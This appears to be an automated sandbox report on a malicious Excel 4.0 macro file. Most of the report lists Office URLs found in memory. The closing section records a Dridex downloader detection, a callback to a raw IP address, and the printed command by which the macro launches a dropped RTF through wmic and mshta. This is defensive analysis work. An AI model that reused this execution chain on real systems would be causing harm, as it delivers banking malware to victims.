      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t$
      Source: EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logLR1
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosS
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpString found in binary or memory: https://pptOSI.D
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://roaming.edog.
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.comRQ;
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmpString found in binary or memory: https://rr.offic
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS_
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work=3
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airl
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airlq
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com#
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com%
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com9
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comF
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comb
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/1G
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: global traffic; HTTP traffic detected:
        GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Language: en-US
        User-Agent: lube
        Host: 157.230.250.107:8080

      E-Banking Fraud:

      Yara detected Dridex Downloader
      Source: Yara match; File source: C:\ProgramData\vqcMnINBAOOJC.rtf, type: DROPPED

      System Summary:

      Found Excel 4.0 Macro with suspicious formulas
      Source: 56449657.xlsm; Initial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheet
      Source: 56449657.xlsm; Initial sample: Sheet name: Macro1
      Contains functionality to create processes via WMI
      Source: EXCEL.EXE, 00000000.00000002.932980210.0000000011780000.00000004.00000001.sdmp; Binary or memory string: C:\Users\user\Documents\ C:\Windows\SysWOW64\Wbem\wmic.exe wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf" C:\Windows\System32\Wbem\wmic.exe WinSta0\Default
      Found obfuscated Excel 4.0 Macro
      Source: 56449657.xlsm; Macro extractor: Sheet: Macro1 high usage of CHAR() function: 21
      Source: 56449657.xlsm; Macro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Code function: 0_3_0F936F70
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Code function: 0_3_0F934F74
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Code function: 0_3_0F828658
      Source: 56449657.xlsm; ReversingLabs: Detection: 13%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown; Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vqcMnINBAOOJC.rtf
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_01
